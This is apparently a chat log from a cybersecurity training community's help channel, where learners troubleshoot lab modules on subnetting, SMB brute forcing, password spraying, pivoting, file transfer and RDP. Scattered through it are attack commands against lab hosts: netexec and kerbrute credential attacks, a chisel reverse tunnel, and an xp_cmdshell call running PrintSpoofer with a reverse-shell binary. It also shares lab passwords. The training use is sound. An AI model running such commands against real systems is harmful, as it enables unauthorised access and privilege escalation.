not SSH.

pick a service that you can brute force easily and quickly

Scan what's available

nvm,i am noob.i run for smb now

that should work ¯_(ツ)_/¯

Though I forget if SMB is set up to accept any pw

(But not auth you fully)

Netexec would be better for smb imo

is this command wrong? netexec --verbose smb 10 10.129.122.249 -u sam -p mut_password.list

because i run it but it doesnt run,so i used msfconsole

You have an extra 10 in there

forget the second 10

no no without it ;p is it correct without it?

should be ¯_(ツ)_/¯

Iirc the syntax is nxc protocol target options

Been a minute though

┌─[parrot@parrot]─[~/Desktop/modules/passattacks/2ndcube]
└──╼ $netexec --verbose smb 10.129.122.249 -u sam -p mut_password.list
[18:40:45] INFO Socket info: host=10.129.122.249, connection.py:106
hostname=10.129.122.249, kerberos=False, ipv6=False,
link-local ipv6=False
INFO Error creating SMBv1 connection to 10.129.122.249: ('unpack smb.py:494
requires a buffer of 1 bytes', "When unpacking field
'SecurityMode | <B | b''[:1]'")
SMB 10.129.122.249 445 NIX01 [*] Windows 6.1 Build 0 (name:NIX01) (domain:) (signing:False) (SMBv1:False)
INFO Error creating SMBv1 connection to 10.129.122.249: ('unpack smb.py:494
requires a buffer of 1 bytes', "When unpacking field
'SecurityMode | <B | b''[:1]'")
SMB 10.129.122.249 445 NIX01 [-] \sam:mut_password.list STATUS_LOGON_FAILURE (The attempted logon is invalid. This is either due to a bad username or authentication information.)

i think i am doing something so wrong

nxc smb --help

still no clue,i ll let msfconsole run ;/

Nxc ran fine for me

for some reason

it wants .txt to run ..... ...

nxc smb 10.129.122.249 -u list.txt -p test.txt run

thanks for the help my friend!

¯_(ツ)_/¯

Submit the decimal representation of the subnet mask from the following CIDR: 10.200.20.0/27

Hydra might be faster

confusing

Subnet masks are filled left to right

I've been rereading the whole thing I'm still confused on what exactly I'm supposed to do

Divide the cidr notation by 8 and use the remainder to fill the next octet. So 27 divided by 8 is 3r3

So you fill the first 3 octects, and the left 3 bits of the next (4th) octet

ah I see I think I got what you mean

Masks are always filled left --> right with bits

So you won't see a mask with 10001000

the first is 10 so it ll be 00001010 . 2^1 + 2^3

Wrong

Well that's for ip addressing

Not for subnet masking

it wants the binary representation

Of the subnet mask

of the IP

OH mb mb

Re-read the question

Ignore them

my bad

They misread the question

alright alright so I take the given cidr and divide it by 8?

Yes and use the remainder for the next octet

does tier IV module, active directory LDAP and powerview increase the chances of passing CPTS?

So if you have a 2r3 (/19) you fill the first 2 octets with bits, then fill the first (left) three bits of the next, and 0 the rest

Not really

hm

Everything you need to pass cpts is included in the course

And extra studying can actually cause you to overthink simple solutions

legit just generally, if you're having trouble and you think maybe you should know the answer, just take a step back chill out. sometimes a reset gets you in the right direction

I can't access my account at https://www.hackthebox.com/login

Https://account.hackthebox.com is the new login portal, they migrated to sso.

They retired the www.hackthebox.com portal

tf this shit so confusing

Thank you

RAAAAHHHH

What's the problem you're running into with understanding

everything I'm not gonna lie

I'm currently watching a YouTube vid

Cidr notation represents how many bits in the subnet mask

So /19 is 19 bits

/27 is 27 bits yeah?

he said that the /? Number shows how many 1s are and the rest are 0s

yes?

So 11111111.11111111.11100000.00000000 in binary or,
255.255.224.0

Yes

Masks are left -> right

yeah

So n number of 1s followed by x 0s where x is 32 - n

You just split it into sets of 8

Because that's how ipv4 operates, in octets [sets of 8]

ye

The question is asking for the binary representation

Which is why I gave you the handy shortcut for filling in how many octects

ooooh

n/8 = xry where x is the number of octects to be filled completely and y is the number of bits in the next one

So 3r3 would be 3 filled with 3 bits for the next set

At VPN Servers What’s the different between UDP and TCP, which one better here ?

Tcp is a connection oriented protocol, so it can be more reliable

There is a question like this in the assembly module. " Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?" But there is no value called _start + 16 in the gdb gef tool. I solved the question, but what is the cause of this error?

Hi guys im stuck on AD skills assesment 1 does anyone know how to download mimkatz.exe onto the MS01 to solve the question "Find cleartext credentials for another domain user. Submit the username as your answer. " i just cant transfer any files onto MS01 for some reason please help

why the r though? And not just xy

Now the hard question, how could I know which server is better for my location

I’m living in Saudi Arabia so guess it’s eu-academy-1 or 2

I guess I was using 2 so I planning to try 1

R just stands for remainder

oh my bad

It's to separate the numbers in a way as to make them distinguished

If I say xy, then you assume multiplication of the numbers

oh alr makes sense

Hi guys. There is a question like this in the assembly module. " Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?" But there is no value called _start + 16 in the gdb gef tool. I solved the question, but what is the cause of this error?

There are many ways. Have you done the file transfer or pivoting modules?

If your file is in hex it'll be _start+A

The +n is the offset/step

wdym by pivot? im trying to download a file thats either on the webshell or on the linux

@fathom pendantI guess I didn't make myself clear.
0x401002 <_start+0002> movsxd esp, DWORD PTR [r9+0x64]
0x401006 <_start+0006> gs ins DWORD PTR es:[rdi], dx
0x401008 <_start+0008> jns 0x40102b
→ 0x40100a <_start+000a> xor rax, 0x21449
0x401010 <_start+0010>
I know that start+0010 hex value is 16, but how to fix it, I don't want it to show with this notation.

is it ok to take notes twice for the same section if I am having trouble focusing?

Sorry yea 10

If it's host to host, should be very simple through a variety of file transfer methods. smb, powershell, rdp shared drives. if it's a computer on an internal vlan the same applies except one step further by pivoting first.

The question is phrased in decimal

But yes 10 would be the right step

like I'm on the vulnerability assessment module and I did this for the first section because due to some mental health issues I'm having trouble focusing and I feel like taking notes twice helps be injest the material better because the whole module is note taking, or at least most of it

alright after all that?

Got it, thank you. But when I solved this module 1 year ago, I got the start_16 result or I remember it wrong Thank you for your help ❤️

@fathom pendant

Your debugging program may have been set in decimal, not hex

So it properly worked

:]

@fathom pendant+1

hi am I asking in the wrong server?

What is your question?

skipping rn

is anyone able to help with this?

I want to know if taking notes for a section once then starting over an hour later and taking notes again is a bad idea

Reading and following #welcome will allow you to post images

Nope

Rereading and revising notes helps reinforce core ideas

27 1s so n/8 = xry so 27/8=3r3 which means...?

3 full octets with 3 bits spilled over to the next

yes

What's your issue?

what do I do with that though

X is full octets, y is remaining bits

It's asking for the binary representation of /27 yeah?

On the abusing ADCS section i have followed the steps to open the mmc but there are no certificate templates to modify

Submit the decimal representation of the subnet mask from the following CIDR: 10.200.20.0/27

Oh decimal

ye

After you do the binary

Convert to decimal

All 1s is 255

Did you add the Certficiate Templates container?

if both 10?

Then it's just 2^7+2^6+2^5

? The ip has no bearing on the subnet mask

The cidr notation is all you need for the mask

oh oh ight thank you

I cheat and use calc.exe in scientific mode and type 11100000 to get it

128+64+32 btw

😭 brooo this shit is stressing

It's really not that difficult

You added the certificate templates snap-in?

I did not see anything in the module notes on how to do that. Can you point me in the right direction

Every octet you fill with 1s is 255

Look under the "Performing the Attack" section, it gives you the steps. You need to add the snap-in, choose certificate templates, then you should see them

Then you just math the one that's not full

kinda makes me doubt if ill go through the cybersecurity master degree I was planning on doing (in about 4years)

ye I get that

What specifically about it is stressing you brother

if ill like yk be okay with it and learn and such yk? Cant explain it well

Thank you!

Tbh, most of the stuff you don't set yourself and is already told to you on what to input

Irl you rarely worry about subnetting unless you're doing the network setup

Cybersec is a broad field, much like pentesting is a specific field-- so is networking

This is just scratching the surface

A full deep dive into network architecture involves setting up VLANs and Switches

I just don't wanna mess up the basics which will make my progress more difficult or something

The more important takeaway is just being able to identify a network at a glance

why those and not less?

11100000

ah

Reading binary is right to left in ascending powers

2^0 would be the rightmost bit

And 2^(n-1) is the leftmost bit, where n is the number of bits

Does anybody know why nmap sometimes work at pwnbox but not vm vpn

Because nmap can be silly. Also if you're running pwnbox and the vpn on your own box at the same time, it causes issues

Well I wasn’t running them at the same time so I guess I’ll agree with you that nmap sometimes be silly

You ever get the pw?

yeah but how do I know I start using 2^7 and not 2^8?

If not I suggest hydra with ftp and 48 threads

Math

can anyone give hint on this
Module: Hacking wordpress
section: Directory Indexing

You know an octet is 8 bits

It’s just annoying when I run my own vm and then need to shift to pwnbox

So the leftmost bit is n-1

Because you don't start adding with 2

PW ?

if it's any consolation I've only encountered an issue like that twice ¯_(ツ)_/¯

Password

Put it this way, a basic math principle is that any number to the power of 0 is 1

Oh I got it and when I run to use it the pwnbox times up and I need to reset and guess what, I FORGOT TO SAVE THE PASSWORD 💔😭

So you start at 0 on the right and go up to 7 on the left, that list of numbers is 8 long

Make sure you don't have both running at the same time. They will both use the same IP, which may answer why your nmap doesn't work sometimes if you've been leaving the pwnbox on.

Sure, I only use my own vm but sometime it doesn’t work which force me to use pwnbox

fuck man

is it always from 2^7?

Hello, good evening, does anyone know why when I try to log in it tells me that my credentials are incorrect? and they are saved.

Yes, it sounds like you have the wrong credentials saved.

Try saving the right credentials instead, hope this helps

but when I created my Google account it told me if I wanted it to save them for me hehe

What module has you make a Google account?

For ipv4, yes

oooooooh

and always go down 2?
like its 2^7 and go another 2 down
2^6 2^5?

Yep

Well

yooooo

You always go down until you run out of bits

It's not always

Are you using account.hackthebox.com or hackthebox.com/login? the first one is the new login and the second is now defunct

oh

It just depends

So a /25 would only be 2^7

but?

because 27 is 2 over or something
my thinking is shit

Ok so

Let's go back to the remainders

yes

So it's 2^(n-1) + 2^(n-2) + 2^(n-3)

yeah

It's a series

mhm

So if you had a remainder of 4, you continue the series

alright wait

do i go like down do 2^4? ;-;

No

RAAAAHH

Your remainder is your count basically

You will never go below the remainder in your series

Oh wait yeah it's 2^4

I didn't math

yay

if you tell me 3
then 2^5?

and so on?

You continue the series yes

Remember it's always a series

alright alright

The remainder just fills the bits in left --> right

mhm

If it helps, write down 8 0s and under them, their relative 2^n representation, then their decimal representation

As a reference sheet

imma watch some youtube vids as well

Professor Messer is a good source

imma check him out

A lot of this stuff is on exams like Network +

Which is why there's tons of info

i see

yeah enough for today lol
too much for my lil brain

broadcast address

naaaah

https://medium.com/networks-security/subnetting-simplified-608aacb5d892

broadcast address is always the last in the available range

which is why you can't assign a device x.x.x.255

and similarly the gateway is generally the first in a range (this number depends how it's split)

This is a neat trick if you don't know about it https://www.youtube.com/watch?v=pITq64bSbMQ

bro will not graduate dude
(havent even started uni)

I never went to college, but I feel like what you're doing is already beyond college level. I talked to a guy the other week who graduated with a 4 year cyber security degree, but he had no idea what ZAP or PortSwigger was despite saying he did CTF's

i wanna do like penetration testing
and yk thought cybersecurity would help at least

no way

really?

unless you don't know the basics of computers and networking

a cybersec degree is for basic fundamentals

usually more blue team too

yeah still gotta go through CS uni first so i still got 4years until the cybersec degree

oh oh i see

maybe there's some specialized degree beyond cybersec that i don't know about, but i haven't ever heard of a pentesting course being taught by a college

yeah no there isnt such thing if im not wrong
its only like cybersec
i think thats the closest thing you can get

neat

i was about to start studying, noticed my vpn isnt connecting and i went to download a new vpn file.. where is the vpn file download now!? lol am i going crazy? but i dont see it

in sections that require it there's a download on the page otherwise:

https://academy.hackthebox.com/vpn

https://academy.hackthebox.com/module/110/section/1054

im on this and there should be a vpn to see the target

It's using a public_ip:port

So not necessary

really? lol damn okay im dumb nvm

your right, normally targets are 10.129.x.x

Log in to WordPress with the credentials for the john user,

is given john creds just example ? or something else

hi guys, Im doing the WP skill assessment. Can someone explain to me based on what he website name resolves ? I'll give an example, When I tried to Fuzz the VHost name and I added the site with the ending of ".htb" to me /etc/hosts file, It didnt resolve but When I changed the /etc/hosts file to ".local" it resolved and I dont understand why.

we would need to see what you added to your hosts file and what command you used to resolve the host, if those two things are correct it will resolve

hi all I have a problem in the footprinting medium lab , I run microsoft sql server management as administrator (trought rdp), but when I want to enter the password i cannot do "@" and it's in the password, so i'm stuck any idea ?

what command are you using that includes the password with @

if it's for rdp, you probably just need to surround your password with quotes

in general; the lab environment is gonna be under one of two tlds - .local or .htb. Sometimes if there's a forced redirect you can figure out what the domain is

thanks

I didnt know that

If the site uses a cert, you can check that for the FQDN, but that is not so common in the labs.

it's actually fairly common

maybe not a TLS cert

no i'm already in the rdp, i am in a windows session, but trough this windows session i must run sql as admin. A new window open where i need to enter a password but in this windows i cannot paste the password with right clic paste or with ctrl v. and i cannot make a @ with alt gr and 0. but the password contain a @

but usually a script scan can reveal a bunch

it's likely using a US-qwerty-keyboard layout

OK. I completed all the labs, I didn't find it too common, but this is an opinion and we can each have our own.

(also you can use those creds to login as the ||adm||)

maybe in the bug bounty path?

¯_(ツ)_/¯

ahh, good point.

but it's fairly common in the pentest path

if you're doing rdp and such and doing /cert:ignore you don't see the cert pop up at all

so how do you do @ in qwerty ?

Not sure, I don't have any issues simply typing "@" when remoted in.

shift + 2

different kb layout

You could try accessibility options and opening the windows built-in on-screen keyboard to type the character most likely.

¯_(ツ)_/¯

lol what keyboard layout doesn't have the @ though.. you need it to email all the time

it has it, just as a different key combo

different layout doesn't mean that symbols stop existing

Im usually swotching around 3 layouts. And its pain once you forget all the combos for | ' @ etc

just means they're in alternate places

then just type it 😛

I think xfreerdp has a way to pass through the kb layout or you can go to settings whenever you rdp in and manually change it

hm i don't think its a qwerty problem, its strange cause anywhere else in the rdp session i can type @ but just in this windows of run as administrator i cannot anymore that's realy strange. i think i will make a post on the forum with a screen. tx for you help

Can you type it in notepad (or whatever) and then copy/paste?

Try the OSK

no i cannot copy paste at all in this window, i try already i can just type letter and number the rest feel unresponsive. the parrot terminal say : unknow key with x keycode 0xfd

what happens with the osk?

i 'm gonna try ...

it work !!!! thank you very much.

and sorry for my bad english it is not my native language

you did fine, didn't even know

can't solve broken authentication module predictable reset token plz help

What did you try?

I'm trying to create a script in order to generate a valid reset token but it doesn't work properly and i don't know why yet

you have to use the time displayed on the website after you have generated the token.
Use milliseconds

gonna take a nap because i don't wanna download/configure ZAP for the intruder section of the Web Proxies module

Hey can I dm you?

sure

Hey guys, I am stuck on the last question of the skill assessment for the NTLM relay attacks module, is there anyone I can DM for a hint ?

can you ask and phrase your question here without spoiling the content i.e. using shorthands like <firstInitial>* for usernames and <firstCharacter>* for passwords, etc.

@fathom pendant I checked back the knowledge check exercise in the getting started module, I was able to inject the payload into one of the theme's source code and when I reloaded some link that links to the target, I got a "CSRF detected" but didn't get a shell back on my netcat listener and now Idk the link I visited to get a shell back, please help

¯_(ツ)_/¯

I don't want t cheat by going to youtube, I want to be able to do this myelf

most people, including myself, used msf to do it

https://academy.hackthebox.com/achievement/361921/85

you'll learn more techniques as you move forward

Thought you said using msf wouldn't work🤨

i suggest not getting hung up on it

😕

i didn't; i said just throwing random shit with msf won't work

Okay👍

you now have an idea of the plugin and vulnerability

Yeah I'll see if I can get it this time, thanks for the help

👍 it's not shameful to look up guides for tier 0 content - sometimes it's overwhelming, especially when Getting Started is a mix of a bunch of surface level stuff

8

2024/05/07 18:47:38 > [+] VALID USERNAME: jjones@inlanefreight.local
2024/05/07 18:47:38 > [+] VALID USERNAME: sbrown@inlanefreight.local
2024/05/07 18:47:38 > [+] VALID USERNAME: tjohnson@inlanefreight.local
2024/05/07 18:47:38 > [+] VALID USERNAME: jwilson@inlanefreight.lo

when password spraying with kerbrute that is active domain username shud i do jjones or jjones@inlanefreight.local?

generally domain users are the username@domain but sometimes it's the whole thing

the samAccountName though is the first bit ¯_(ツ)_/¯

i c

i even used pw for one of the accs and it still didnt show up a t success

like there shudve been one hit since i used a pw from useri n that list

put the users in a file

i did

i was just giving an example of what they looked like

also don't fucking print the giant list

soz

we get the idea

also what did you put for the password?

a password from one of the users

but it got 0 hit then also Welcome1 Password123

but 0 hit...

Welcome1 should work for one of the users in your list

also again you can just delete the list you pasted here

as it may contain spoilers, alongisde your comment

this shid just dont make sense///

the password Welcome1 may work

i tried it but no work..

this Q right?

KK021
SM297
ZT938
UK023

like this is my users list

yes

└──╼ $kerbrute passwordspray -d inlanefreight.local --dc DCIP users Welcome1

i used crackmapexec with domain acc to get users

2024/05/07 19:29:35 > Using KDC(s):
2024/05/07 19:29:35 > DC IP:88

try signing onto one of the windows hosts and import DomainPasswordSpray --> use that ¯_(ツ)_/¯

i c make sense danke

also weird that it's saying DC IP :88

if you do --verbose or whatever the flag is, it should show you what it's doing

i have a feeling it's not reading the users file or it's doing something funky

Try using the DNS name and not the IP

ip should work

ya it should. 🤷‍♂️

¯_(ツ)_/¯

something is slightly off

i suggest also naming the userfile users.txt or users.list

¯_(ツ)_/¯

also when in doubt use ./ to tell it to use cwd for the file ./users.txt

┌─[htb-student@skills-par01]─[~]
└──╼ $./chisel client 10.10.15.127:9999 R:socks
2024/05/07 19:52:52 client: Connecting to ws://10.10.15.127:9999
2024/05/07 19:52:53 client: Connected (Latency 79.153822ms)

why wont this work
┌──(sam㉿kali)-[~/chisel]
└─$ ./chisel server --port 9999 --reverse

2024/05/07 16:51:10 server: Reverse tunnelling enabled
2024/05/07 16:51:10 server: Fingerprint g3LIdXHgewAUTP4DXt3pdT5CJS/DRh4gFGonf3LSpKM=
2024/05/07 16:51:10 server: Listening on http://0.0.0.0:9999
2024/05/07 16:52:00 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

└─$ proxychains ping 172.16.7.3
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
PING 172.16.7.3 (172.16.7.3) 56(84) bytes of data.

socks5 127.0.0.1 1080

i'd just run the commands with the tools on the par01 host

i c makes sense

you can pivot, but no need considering you have a stable host to use ¯_(ツ)_/¯

and yes, you can rdp to that host

just dynamic ssh, so much easier

if you want to use chisel, you generally need to use an old version because the parrotboxes don't have the libraries for the newer versions, i believe 1.7.3 or below is fine

i c makes sense danke

also, if you're using chisel, make sure it's setup for socks5 in your proxychains.conf

but yeah a lot easier to just dynamic port forward, it's sshing in with one extra parameter, vs sshing in and setting up chisel

^

Or use ligolo

lig what now?

i still need to set that up some time everyone talks so highly of it

Pretty much more managed tunneling

seems pretty similar, if not exactly the same as wireguard. it even uses wireguard's drivers

Simpler to set up

And the dev has a tun of compiled versions

a tun... i see what you did there

bruh └─$ ssh -D 9090 htb-student@10.129.39.248
└─$ sudo proxychains xfreerdp /v:172.16.7.3 /u:AB920
┌─[htb-student@skills-par01]─[~]
└──╼ $channel 3: open failed: connect failed: Connection refused
channel 3: open failed: connect failed: Connection refused
channel 3: open failed: connect failed: Connection refused

defaults set to "tor"

socks5 127.0.0.1 9090

if i xfreerdp from the attack host its just really laggy

its too slow..

ssh dynamic port forwarding uses socks4

maybe i'm not understanding your setup

you would be sshing into the parrotbox, the one you're logged into htb-student with

i think he's (poorly) showing that after doing the dynamic forward, it's still not showing

but also idk if rdp is available on the A* host

looks like the pivot is working, but it's the box that's refusing it then

it might be and i'm misremembering

still not sure though, not enough details for us to know

yeah the DC doesn't have rdp enabled

they're trying to RDP to DC with a different machine's user

Hey guys for the module introduction to windows commande line i'm stuck at a question of conten ""Finding files and directories"". I have to find the flag that is in the waldo.txt file but i can't find it i tried a lot of things but nothing worked. Hers the question. Any advice?

trees or where will help you

as i stated in your community help post

tree /? and where /? will give you the command arguments that they accept

or you can look at the cheat sheet for a reference of commands and syntaxes

@fathom pendant i already did just not the tree i will look tommorow

when in doubt ask chatgpt for the command

nothing with tree

i can assure you it can be found with tree

again if you use /? with a command it gives you all the available options and flags for it

the tree command is OP tbh

i used tree /F

and the waldo.txt is nowhere

where are you using it from

if you're using it from your current home directory you won't find anything

maybe branch out from Users

I'm sure this has been linked 1000x but I think a module question is wrong. It's a small thing but where can I provide feedback?

every time i thought that i was wrong

PS C:\Users\htb-student> tree /F

but it show everything also in c:\

go one step back

branch out from Users

Well... this is a very simple thing and there are only 3 cases to check. If anyone has done the command injection module I could run it by them to verify before I submit anything

sure

ohhhhhhhhhh

yupiee

but why?

Why did i not see it from the C:\Users\htb-student>

because by default; tools only assume their start is from the current working directory

so it doesn't look backwards

like if you do dir it doesn't show you the dir listing of the previous folder

it shows you the current folder

but if you specify dir C:\users\ it lists the C:\users directory

it doesn't know you want to look beyond it

or in this case go one step back and look at it all

If you're looking for the file itself you could use these in a powershell session

Get-ChildItem -Path C:\<add the rest> -name <the file name> -Recurse -Force

Once you find the file use Get-Content to output it by using this

Get-Content -Path <enter file path>

that works too

or in CMD the where command

my best guess is they didn't specify the starting point early enough, and so they were stuck at C:/users/htb-student wondering why it didn't look at the whole computer

mmmm that looks to be it really

yeag but i find an alternative by using where form the root

thnks for you help

that also works

as long as you're before the parent directory that hosts the file, it will find it

directory hierarchy we must remember

Working on the web skills assessment and I'm at the point to reset the admin password, I've found a technique that will allow me to do this but it complains about missing parameters. Looking at the source code, it appears I have all parameters in my request. Any nudges?

Thank you very much @cloud urchin

It turns out the module was right and I am a confirmed dum dum

any advice for config file on AD Enumeration & Attacks - Skills Assessment Part II AD Enumeration & Attacks - Skills Assessment Part II i che ked th files on|| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config|| cant find

• 1 Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

https://academy.hackthebox.com/achievement/667914/110 :D neat showcase of some proxy tools

That "change request method" feature is nifty

nvm i find

XXE is definitely something I need to practice

Im big chilling on the ffuf module

it's a nice diverse tool

I'm using the guide as a sort of "ok I got it, but how did they want me to get it now" and it's like "oh, the same way, nice"

bop

https://academy.hackthebox.com/achievement/667914/54 ez

ffuf is actually so useful

SQL> EXEC xp_cmdshell '"C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\PrintSpoofer64.exe" -c "C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\reverse_shell.exe"'

why wpt this work 05/07/2024 11:35 PM 27,136 PrintSpoofer64.exe

05/07/2024 11:41 PM 7,168 reverse_shell.exe

SQL> EXEC xp_cmdshell '"C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\PrintSpoofer64.exe" -c "C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\reverse_shell.exe"'
output

The filename, directory name, or volume label syntax is incorrect.

NULL

damn i got it to work dis shid is long..

doesn't look like it's working to me

unless you figured out your mistake

damn so far the bruteforce module is EZ

WPScan was able to find valid credentials for one user, john:firebird1.

when i try those cred it giving errors wrong creds

https://tenor.com/view/bilei-cat-bileilike-likebilei-gif-19253394

solved

?

i like that module

i've done completed that and am almost done the bruteforcing module

i want to see this same energy on AEN

https://tenor.com/view/bruh-gif-23163386

these web modules are a breeze compared to the behemoth of AD enum

yeah it's easy sailing from there

like in the past i wanna say 6 hours i've completed the web module from then to this one

working my way through the services assessment now

so if a peson doing web app job do they need that AD knowledge or they can work witout it

nah

AD isn't really involved in web app stuff

hmmm, so getting job in app sec can be easier for fresher?

it just depends

app sec is still a tough job ¯_(ツ)_/¯

you gotta know code reviewing and stuff like that

and you have to be relatively well versed in the lang you're testing

you might run into internal web apps running inside private networks for a company, but i imagine the only way you'd get there is through a regular good o' pentest. so the web skills can still aid a pentester, but if you're focusing specifically on external websites then yeah i agree ad probably isn't going to be involved much beyond maybe authentication type things.

indireclty becoming web dev by learning app sec lol

and even that's a stretch, AD oauth generally isn't gonna be used for outside stuff except maybe 2FA and SaaS solutions

eh moreso on the internal web app

i worked for a fortune 500 that had some really shitty insecure java website internally

yeah

that's what i was referring to

externally

and snmp (:

internally; OAUTH go brrr :)

free packets for days

granted in a TLS wrapped environment they mean nearly nothing

i was more more talking to jojo about the question 'if a person does web app job do they need that ad knowledge'

just saying it may aid if you're pentesting like normally to know web, but not so much the other way

can definitely still happen though

these sysadmins are stressed

thx for explanations

so i have completed 90% cpts and have cube to buy 1 module , which modules should i do after cpts

no specfic question just asking for opinion on recommend modules to try

whatever you want to my guy

do a module that interests you

there's plenty of higher tier AD modules (that are completely unnecessary for CPTS) if you wanna dive more into AD

my vote goes to adcs

https://academy.hackthebox.com/achievement/667914/57 done

i forgot to tick a box in cupp

and just like that

gonna get some sleep before tackling SQLi

But speaking of brute forcing, everything was easy since I kinda just... read it

overall is using AI to remember some command syntax but overall i know what i am doing wrong ?

I would suggest fucking with a command or copy/pasting it into a note-taking app

It'll help you understand it more

It's all fun and games until you lock out systems or mess things up in some other way. Just because you don't want to take good notes? Note taking is a part of learning.

AI is good and a lot of times it can help your syntax but it also makes stuff up and is just flat out wrong sometimes. You don't want to rely on it and instead be diligent in note taking.

I often just can do <command> --help or man <command> and find the syntax mistaken faster

yeah i will start taking notes fr

AI can be a valuable tool. But it shouldn't replace your brain and regular notes

I use ai a lot for grunt work. I lost a day recently cause I asked it to change a script. It "corrected" something that it thought was a mistake and I never checked it.

yeah it's pretty awesome for stuff like that

That's the first time its screwed me over since using paid Chat GPT 4

ohhh i see lol

i misread your statement

In fairness it was a weird thing only a human could notice perhaps

yeah and then you can correct it and it'll be like "oh yeah sorry you're right"

But still I got used to it being right

I work with a lot of student code so its amazing for reading and fixing their code

Up to a point

yeah it's fixed my syntax many times, but then also i've seen it completely make up parameters that don't even exist for the app

Yeah for sure

And the free one is awful for that

The paid one is pretty sick

Especially that I can screen shot and drop that in

I was setting up an AD network to play with yesterday and its so handy to have an expert there to ask

But yeah you kinda have to know what the answer should be anyway and just use it as a time saver or it can drop you in wonderlamd

yeah you need to know how to frame your questions properly so you need to have an understanding, at least enough of an understanding to know exactly what to ask for

in the past i noticed chatgpt refused to answer a lot of pentesting questions without more persistence, but lately it seems it gave up and just answers questions without bothering anymore.

Im getting error while doing nmap scan

Host seems down

im connected to vpn

try a traceroute

I wondered about this

Did someone manually review or something

Mine was the same and occasionally out of the blue it starts saying it can't help with that. Not to be relied on

how to

sorry i dont know how to

the command is "traceroute"

yeah it opened help

it should tell you there what to do. traceroute <ip>

that should show you where your connection is failing

i did ifconfig and i dont know which one to use

tun0 on VPN

what module are you on?

service scanning

getting started

alright well connection issues are generally going to boil down to only a few reasons. 1) you're not connected to the vpn, or on the wrong vpn. 2) you didn't spawn the victim host or are inputting the wrong ip address for the victim host. 3) you also have the pwnbox spawned while on the vpn which will cause conflicts because they share the same ip. 4) the box actually died in which case you may just need to restart it.

1. im
   2)no typo, i tried same ip in pwnbox(after failing to use it with vpn) it was working [i dont know but target took long to spawn]
   3)no
   4)(2)

well, go back to traceroute and see where the connection is failing

i would still wager it's one of the other things i mentioned

what message it shows after you connect to vpn

idk i never pay attention to that

i run it as a background process and forget it

it didnt fail so

you can type "ip a" and see if you have a tun0 (for kali)

im on parrot

and there are 4 tun

ip a will work but the adapter may be named different idk i don't use parrot

ens something?

im seeing these for first time

what is unpsec

everytime new error

read the error it will likely tell you what's wrong

no error

traceroute ip(tun0)

no, you need to traceroute to the victim

i still think it's one of the things i said, i really don't believe you did it all correctly because that will solve 99.99999% of people's issues here

what are the ways to check what i did wrong

if you're connected to the vpn and ensure you're using the correct target IP address, the correct nmap syntax, and don't have the pwnbox spawned you should have no issues reaching the victim box.

you could also just use the pwnbox instead of your own machine

its laggy and limited time so

not really

it despawns after like what, 6 hours you can go up to?

i never had this problem before

then you can just respawn it again

oh nm idk if the pwnbox even despawns at all

i was thinking of the victim box

the ip didnt change when i did ifconfig

with and without vpn

what's the full ip

also what's the victim box ip, and what is your nmap command

nmap -sV target

show a screenshot of your adapter connected to the vpn, show a screenshot of your nmap command

adapter?

yeah your vpn connection

where to

ip a

its looks same as ifconfig

show the whole thing

tun0 right?

type ip a, and show the whole thing

and which vpn did you connect to

eu TCp

also still waiting on that traceroute

but it showing ip is it safe?

i'll need to see all of the stuff not just some and not cut off pics

you can black out your public ip

i don't need that

Did someone here finished the Trust module skills assesment? i have a question if i may to dm?

also show a screenshot of the victim ip you spawned

bruh i got stuck on the trust attacks because the creds they provide don't work how the hell did you get past that

can i dm you

why

the ss only

ok

AD Trust attacks, these creds simply do not work. What am I doing wrong here?

login failure due to bad credentials via xfreerdp and remmina

Try Test@1234 as password

ok, same result

Or was it Test@123

I had the same issue

that worked. what the heck??

thank you so much

The description is wrong

dang. glad i asked

The HTB_ ... password is meant for internal machines

legend thank you

I also had a gigantic WTF moment

is that a box? this channel is for modules from academy

oop mb

https://tenor.com/view/off-with-their-head-gif-22148762

:((

Hello, I am working on the module "File transfer", section "Windows File Transfer Methods", and I am at the paragraph "Connecting to the Webdav Share".
I have followed the previous steps to set up a WebDAV server on my Linux machine:
$sudo ./python3_venv/bin/wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
However, I cannot access this server from my target machine as showed in the module:

PS C:\Users\htb-student> dir \\10.10.15.145\DavWWWRoot
dir : Cannot find path '\\10.10.15.145\DavWWWRoot' because it does not exist.
At line:1 char:1
+ dir \\10.10.15.145\DavWWWRoot
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (\\10.10.15.145\DavWWWRoot:String) [Get-ChildItem], ItemNotFoundExceptio
   n
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

The thing is I can access it using wget:

PS C:\Users\htb-student> wget http://10.10.15.145/tutu/file.txt -OutFile tutu.txt
PS C:\Users\htb-student> type tutu.txt
tutu

I also tried to directly specify the folder tutu:

PS C:\Users\htb-student> dir \\10.10.15.145\tutu
dir : Cannot find path '\\10.10.15.145\tutu' because it does not exist.
At line:1 char:1
+ dir \\10.10.15.145\tutu
+ ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (\\10.10.15.145\tutu:String) [Get-ChildItem], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

Why can't I access to my WebDAV share using UNC path?
Thanks.

Have you tried this outside of a venv?

Does the folder 'DavWWWRoot' exists where you have spawned the 'Webdav Share'?

The folder "DavWWWRoot" does not have to exist. As said in the module:

DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. The DavWWWRoot keyword tells the Mini-Redirector driver, which handles WebDAV requests that you are connecting to the root of the WebDAV server.

But, in the doubt, I created a folder tutu and tried to access it. It works using wget but not using UNC path.

I will give it a try.

I didn't have any issues outside of a virtual env so give that a shot

It does not work either. On Linux:

